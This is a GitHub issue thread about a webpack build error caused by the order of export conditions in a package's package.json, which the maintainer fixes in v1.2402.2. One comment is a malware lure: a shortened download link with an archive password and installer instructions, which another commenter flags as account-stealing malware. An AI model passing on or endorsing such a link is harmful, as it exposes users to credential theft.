### ISSUE TITLE
Webpack build fails due to wrong export order: default condition not being the last one

### ISSUE THREAD

**Issue by waza-ari** [baumerdev/ibantools-germany#24]
## Expected Behavior
Project build to succeed.

## Actual Behavior
As a result of the changes introduced in #22, NextJS webpack projects importing this project no longer compile with the following error message:

```
Module not found: Default condition should be last one
```

According to the [webpack documentation](https://webpack.js.org/guides/package-exports/):

> The last condition in the object might be the special "default" condition, which is always matched.

In your `package.json`, the default export is not the last one:

```
"require": {
        "default": "./dist/cjs/main.js",
        "types": "./dist/cjs/main.d.ts"
      },
      "import": {
        "default": "./dist/esm/main.js",
        "types": "./dist/cjs/main.d.ts"
      }
```

See also this [SO answer](https://stackoverflow.com/a/76127619/1627106) or the following very [similar issue](https://github.com/firebase/firebase-js-sdk/issues/7005) in the Firebase project which was fixed by simply [reordering the statements](https://github.com/firebase/firebase-js-sdk/pull/7006/files).

Locking the version @1.2401.0 makes the problem go away.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.

**Comment by baumerdev** [comment]
I've updated the package to v1.2402.2. Please try it with the new version, and let me know if it resolves the issue.

**Comment by waza-ari** [comment]
Hi, that was fast! I can confirm that it's broken with `v1.2402.1` and works again after upgrading to `v1.2402.2`. Thank you!
